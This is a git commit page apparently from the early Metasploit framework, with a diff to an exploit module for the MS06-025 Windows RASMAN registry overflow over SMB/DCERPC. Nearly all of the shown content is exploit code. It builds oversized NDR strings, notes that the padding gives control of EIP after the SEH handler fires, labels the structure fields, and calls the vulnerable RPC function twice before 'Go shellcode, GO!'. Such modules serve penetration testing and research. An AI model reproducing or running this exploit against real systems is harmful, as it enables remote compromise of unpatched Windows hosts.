Closer...
git-svn-id: file:///home/svn/framework3/trunk@3713 4d416f70-5f16-0410-b530-b9f4589650daunstable
HD Moore
parent
0cf2909fda
commit
bb0def749f
|
|
@ -54,32 +54,38 @@ class Exploits::Windows::Smb::MS06_025_RASMANS_REG < Msf::Exploit::Remote
|
||||||
print_status("Binding to #{handle}")
|
print_status("Binding to #{handle}")
|
||||||
dcerpc_bind(handle)
|
dcerpc_bind(handle)
|
||||||
print_status("Bound to #{handle}")
|
print_status("Bound to #{handle}")
|
||||||
|
|
||||||
|
# This ends up mapping to invalid unicode and breaks the exploit
|
||||||
|
patt = Rex::Text.pattern_create(1024)
|
||||||
|
|
||||||
|
# This triggers eip = 0x51515151 after seh is triggered
|
||||||
|
patt = "\x51" * 1024
|
||||||
|
|
||||||
type2 =
|
type2 =
|
||||||
NDR.wstring("\x41" * 255) +
|
NDR.string( ("\x41" * 1024) + "\x00" ) +
|
||||||
NDR.wstring("\x41" * 4096) +
|
NDR.string( (patt) + "\x00" ) +
|
||||||
NDR.wstring("\x41" * 4096) +
|
NDR.string( ("\x61" * 4096) + "\x00" ) +
|
||||||
NDR.long(4) +
|
NDR.long(4) +
|
||||||
NDR.long(4)
|
NDR.long(4)
|
||||||
|
|
||||||
type1 =
|
type1 =
|
||||||
NDR.long(4) +
|
NDR.long(4) + # OperatorDial
|
||||||
NDR.long(4) +
|
NDR.long(4) + # PreviewPhoneNumber
|
||||||
NDR.long(4) +
|
NDR.long(4) + # UseLocation
|
||||||
NDR.long(4) +
|
NDR.long(4) + # ShowLights
|
||||||
NDR.long(4) +
|
NDR.long(4) + # ShowConnectStatus
|
||||||
NDR.long(4) +
|
NDR.long(4) + # CloseOnDial
|
||||||
NDR.long(4) +
|
NDR.long(4) + # AllowLogonPhonebookEdits
|
||||||
NDR.long(4) +
|
NDR.long(4) + # AllowLogonLocationEdits
|
||||||
NDR.long(4) +
|
NDR.long(4) + # SkipConnectComplete
|
||||||
NDR.long(4) +
|
NDR.long(4) + # NewEntryWizard
|
||||||
NDR.long(4) +
|
NDR.long(4) + # RedialAttempts
|
||||||
NDR.long(4) +
|
NDR.long(4) + # RedialSeconds
|
||||||
NDR.long(4) +
|
NDR.long(4) + # IdleHangUpSeconds
|
||||||
NDR.long(4) +
|
NDR.long(4) + # RedialOnLinkFailure
|
||||||
NDR.long(4) +
|
NDR.long(4) + # PopupOnTopWhenRedialing
|
||||||
NDR.long(4) +
|
NDR.long(4) + # ExpandAutoDialQuery
|
||||||
NDR.long(4) +
|
NDR.long(4) + # CallbackMode
|
||||||
|
|
||||||
NDR.long(0x45) + type2 + # Parsed by CallbackListFromRpc
|
NDR.long(0x45) + type2 + # Parsed by CallbackListFromRpc
|
||||||
NDR.wstring("\x00" * 129) +
|
NDR.wstring("\x00" * 129) +
|
||||||
|
|
@ -103,10 +109,18 @@ class Exploits::Windows::Smb::MS06_025_RASMANS_REG < Msf::Exploit::Remote
|
||||||
|
|
||||||
stubdata = type1 + NDR.long(4)
|
stubdata = type1 + NDR.long(4)
|
||||||
print_status('Stub is ' + stubdata.length.to_s + ' bytes long.')
|
print_status('Stub is ' + stubdata.length.to_s + ' bytes long.')
|
||||||
print_status('Calling the vulnerable function...')
|
|
||||||
|
|
||||||
begin
|
begin
|
||||||
|
print_status('One for the money...')
|
||||||
response = dcerpc.call(0xA, stubdata)
|
response = dcerpc.call(0xA, stubdata)
|
||||||
|
|
||||||
|
print_status('Two for the show...')
|
||||||
|
response = dcerpc.call(0xA, stubdata)
|
||||||
|
|
||||||
|
print_status('Three to get ready...')
|
||||||
|
print_status('Go shellcode, GO!')
|
||||||
|
|
||||||
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
|
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue